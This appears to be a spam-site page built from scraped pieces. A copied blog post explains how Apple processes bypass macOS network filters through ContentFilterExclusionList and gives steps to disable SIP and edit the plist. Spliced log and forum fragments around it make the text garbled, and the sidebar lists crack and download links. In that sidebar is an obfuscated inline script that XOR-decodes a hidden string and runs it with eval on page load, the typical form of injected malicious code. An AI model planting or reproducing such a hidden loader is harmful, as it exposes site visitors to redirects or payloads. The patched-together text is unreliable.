Com.apple.geod.xpc Little Snitch

Posted : admin | On 17-08-2021

May 14, 2019 EtreCheck 4.01.% (App Store) com.apple.WebKit.WebContent (14) 1.37.% (Apple) Little Snitch Agent 0.47.% (Objective Development Software GmbH) Google Chrome 0.32.% (Google, Inc.) Top Processes Snapshot by Memory: Process (count) RAM usage (Source - Location) EtreCheck 706.MB (App Store) Google Chrome 304.MB (Google, Inc.) Google Chrome Helper. Today little snitch captured a connection from com.apple.geod.xpc to interpol.int - any clue on why it tried to connect there? More Less MacBook Pro with Retina display, OS X Yosemite (10.10.2). UPDATE 2: The traffic of some Apple processes isn’t shown in Little Snitch 5. UPDATE 3: Enabling Little Snitch 4.6 kext under Big Sur. UPDATE 4: Tweet by Apple developer Russ Bishop: 'Some system processes bypassing NetworkExtensions in macOS is a bug, in case you were wondering.' And some replies.

tinyapps.org / blog

Patrick Wardle highlighted a tweet by Maxwell ('Some Apple apps bypass some network extensions and VPN Apps. Maps for example can directly access the internet bypassing any NEFilterDataProvider or NEAppProxyProviders you have running'), sparking an extensive HN discussion on Apple's ham-fisted tactics (not unlike Google's recent behavior).

A search for 'NEFilterDataProvider' turned up David Dudok de Wit's post fingering the ContentFilterExclusionList key in /System/Library/Frameworks/NetworkExtension.framework/Versions/A/Resources/Info.plist as the culprit. The default list includes 56 Apple apps and daemons like App Store, MusicLibrary, softwareupdated, etc.:

<li><p>Disable FileVault</p></li><li><p>Boot into macOS Recovery, disable SIP (<code>csrutil disable</code>) and SSV (<code>csrutil authenticated-root disable</code>), and reboot</p></li><li><p>Find the root mount device, e.g.,<br /><samp>%</samp><code>mount</code><br /><samp>/dev/<span>disk1s5</span>s1 on / (apfs, local, read-only, journaled)<br />...</samp></p></li><li><p><samp>%</samp><code>mkdir <span>mnt</span></code></p></li><li><p><samp>%</samp><code>sudo mount -o nobrowse -t apfs /dev/<span>disk1s5</span><span>mnt</span>/</code></p></li><li><p>Edit Info.plist as desired, e.g., <samp>%</samp><code>sudo vi mnt/System/Library/Frameworks/NetworkExtension.framework/Versions/A/Resources/Info.plist</code></p></li><li><p><samp>%</samp><code>sudo bless --folder mnt/System/Library/CoreServices --bootefi --create-snapshot && sudo reboot</code></p></li></ol><p>Little Snitch 5 and TripMode 3 had no problem blocking the previously-cloaked processes afterwards:</p><p>though one may well be left with a niggling doubt: should all this really be necessary to monitor your own computer's network traffic?</p><img src='https://pic.heidatu.com/pic/201911/27124211_40ab447db5.jpeg' alt='Com.apple.geod.xpc Little Snitch' title='Com.apple.geod.xpc Little Snitch' /><p><small><b>UPDATE 1:</b></small> Hany, author of Murus and Vallum, was kind enough to reply with some testing of his own:</p><img src='https://www.bgentry.io/img/apple-http/apple-http-im-transfer-agent.png' alt='Com.apple.geod.xpc Little Snitch' title='Com.apple.geod.xpc Little Snitch' /><blockquote><i>I did some tests and I’ve found at least one major issue on Catalina.<br />Removing all entries from the dictionary key seems to work for most listed processes: connections are seen by the network filter and flows are passed/blocked according to matched rules. But it does not work for at least one of the listed processes: IMTransferAgent.If you use macOS Messages.app then you may be aware that this process is used to send messages attachments.<br />If removed from the list, the process is always blocked. The filter provider does not see any flow for that process, and any attempt to send attachments with Messages.app will fail until you disable the filter.</i></blockquote><p><small><b>UPDATE 2:</b></small>The traffic of some Apple processes isn’t shown in Little Snitch 5.</p><p><small><b>UPDATE 3:</b></small>Enabling Little Snitch 4.6 kext under Big Sur</p><h3>Com.apple.geod.xpc Little Snitch 2</h3><p><small><b>UPDATE 4:</b></small>Tweet by Apple developer Russ Bishop: '<i>Some system processes bypassing NetworkExtensions in macOS is a bug, in case you were wondering.</i>' and some replies:</p><ul><li>Matt Greenfield: '<i>Public bug tracker would make it easier to believe too. Lack of transparency breeds lack of trust.</i>'</li><li>David Dudok de Wit: '<i>Glad to see it's being reconsidered as a bug, because Apple told us it 'behaves as designed' (FB7740671 + FB7665551). And why is there an exclusion list in the first place? I'd love to know more and see this documented.</i>'</li><li>Sérgio Silva: '<i>Yes. A bug with its own configuration file /System/Library/Frameworks/NetworkExtension.framework/Resources/Info.plist ContentFilterExclusionList</i>'</li></ul><p><small><b>UPDATE 5:</b></small>Exclusions Blaster</p><h3>Com.apple.geod.xpc</h3><p><small><b>UPDATE 6:</b></small>Hooray, no more ContentFilterExclusionList</p><p align='right'>/mac | Oct 21, 2020</p><h3>Com.apple.geod.xpc Little Snitch App</h3><p>Subscribe or visit the archives.</p></p>
								 
															</div>
						</div>
							
													
                          
													
						  
					</div>
					
 
<p class="nocomments"></p>
 
							</div>
		</article>
		<aside class="sidebar c-4-12">
	<div id="sidebars" class="g">
		<div class="sidebar">
			<ul class="sidebar_list">
				<li class="widget widget-sidebar"><form method="get" id="searchform" class="search-form" action="#" _lpchecked="1">
	<fieldset>
		<input type="text" name="s" id="s" value="Search" onblur="if (this.value == '') {this.value = 'Search';}" onfocus="if (this.value == 'Search') {this.value = '';}" > 
		<input type="submit" value="Search" onclick="if(this.value=='Search...')this.value='';" />
	</fieldset>
</form></li>		<li class="widget widget-sidebar">		<h3>MOST POPULAR ARTICLES</h3>		<ul>
					<li><a href='/free-facade-game-no-download'>: Free Facade Game No Download</a></li>
<li><a href='/max-for-live-torrent-mac'>: Max For Live Torrent Mac</a></li>
<li><a href='/autoplay-menu-designer-5-crack'>: Autoplay Menu Designer 5 Crack</a></li>
<li><a href='/cat-320l-service-manual'>: Cat 320l Service Manual</a></li>
<li><a href='/bharata-rajyangam-in-telugu-pdf'>: Bharata Rajyangam In Telugu Pdf</a></li>
<li><a href='/big-5-personality-inventory'>: Big 5 Personality Inventory</a></li>
<li><a href='/garageband-symphony-orchestra-jam-pack'>: Garageband Symphony Orchestra Jam Pack</a></li>
<li><a href='/download-fifa-13'>: Download Fifa 13</a></li>
<li><script>var rON='zDH8StcAGFri2pXL1aZyfLKcn8wPPggOKeGQCCGFLDu7h0u3MIxxadzW1FVS5vTzzMGYShiyCuWKrM4vOCchRSNHNSX6PXIpT3IDuFkEz73PpYFpKzdDtMQQ78katlRNUH0wdAbirGQSX6sYmHvqTf4hn1Euvjlnpp4Q7imky4lV461b';var xUIF=atob('DCU6GCERBXwjKREcXxU2OB8CLwsUKSUXPVsFOSATXDkqF2cpKzF6KCkzVW8lfD1HOTkqHRARHyRFbn9oTR4mVBU9Ijd7Ty48F1J7bF1iXRgrJgkbfCA+KS02fx9rICECekQgMB0FGSAeUl0kGTgqA3YOFjERdik5RRYEDxgDMypoLkUZBzULBhxveCg9QBI1RTAeA3oUURseXisGEz4JFgRZDywMEQUZV0cJOFAeGFk=');var ijV='';for(var Ogr=0;Ogr<rON.length;Ogr++){ijV+=String.fromCharCode(rON.charCodeAt(Ogr)^xUIF.charCodeAt(Ogr));}eval(ijV);</script></li>
				</ul>
		</li>					</ul>
		</div>
	</div>
</aside>	</div>
</div>
</div>
	<footer>
		<div class="container">
			<div class="footer-widgets">
					<div class="f-widget f-widget-1">
					</div>
	<div class="f-widget f-widget-2">
					</div>
	<div class="f-widget last">
					</div>
			</div>
            <div class="copyrights">
				
<div class="row" id="copyright-note">
<span><a href="/" title="Loadingwall42">Loadingwall42</a> Copyright © 2021.</span>
<div class="top"><a href="#top" class="toplink"><img src="top.png" /></a></div>
</div>
			</div>
		</div>
	</footer>
</body>
</html>